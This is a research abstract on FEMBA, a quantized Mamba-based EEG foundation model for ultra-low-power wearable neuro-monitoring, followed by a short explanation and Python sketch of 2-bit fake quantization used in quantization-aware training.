Abstract:Objective: To enable continuous, long-term neuro-monitoring on wearable devices by overcoming the computational bottlenecks of Transformer-based Electroencephalography (EEG) foundation models and the quantization challenges inherent to State-Space Models (SSMs). Methods: We present FEMBA, a bidirectional Mamba architecture pre-trained on over 21,000 hours of EEG. We introduce a novel Physiologically-Aware pre-training objective, consisting of a reconstruction with low-pass filtering, to prioritize neural oscillations over high-frequency artifacts. To address the activation outliers common in SSMs, we employ Quantization-Aware Training (QAT) to compress the model to 2-bit weights. The framework is deployed on a parallel ultra-low-power RISC-V microcontroller (GAP9) using a custom double-buffered memory streaming scheme. Results: The proposed low-pass pre-training improves downstream AUROC on TUAB from 0.863 to 0.893 and AUPR from 0.862 to 0.898 compared to the best contrastive baseline. QAT successfully compresses weights with negligible performance loss, whereas standard post-training quantization degrades accuracy by approximately 30%. The embedded implementation achieves deterministic real-time inference (1.70 s per 5 s window) and reduces the memory footprint by 74% (to approximately 2 MB), achieving competitive accuracy with up to 27× fewer FLOPs than Transformer benchmarks. Conclusion: FEMBA demonstrates that Mamba-based foundation models can be effectively quantized and deployed on extreme-edge hardware without sacrificing the representation quality required for robust clinical analysis. Significance: This work establishes the first full-stack framework for deploying large-scale EEG foundation models on ultra-low-power wearables, facilitating continuous, SSM-based monitoring for epilepsy and sleep disorders.
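The 2-bit weight compression via QAT rests on "fake quantization": in the forward pass, weights are snapped to a coarse integer grid, while gradients bypass the rounding (straight-through estimator). A generic per-tensor symmetric sketch of that forward step (illustrative only; FEMBA's exact quantizer, scale handling, and outlier treatment may differ):

```python
import numpy as np

def fake_quant_2bit(w):
    """Per-tensor symmetric fake quantization to signed 2-bit integers.
    During QAT this forward pass is paired with a straight-through
    estimator so gradients still flow to the full-precision weights."""
    qmin, qmax = -2, 1                   # signed 2-bit integer range
    scale = np.abs(w).max() / abs(qmin)  # map the largest magnitude onto the grid
    q = np.clip(np.round(w / scale), qmin, qmax)
    return q * scale, scale              # dequantized weights + scale

rng = np.random.default_rng(0)
w = rng.normal(size=1000)                # stand-in for a weight tensor
w_q, scale = fake_quant_2bit(w)
```

With only four representable levels, the choice of scale and the handling of activation outliers dominate accuracy, which is consistent with the paper's finding that naive post-training quantization collapses while QAT does not.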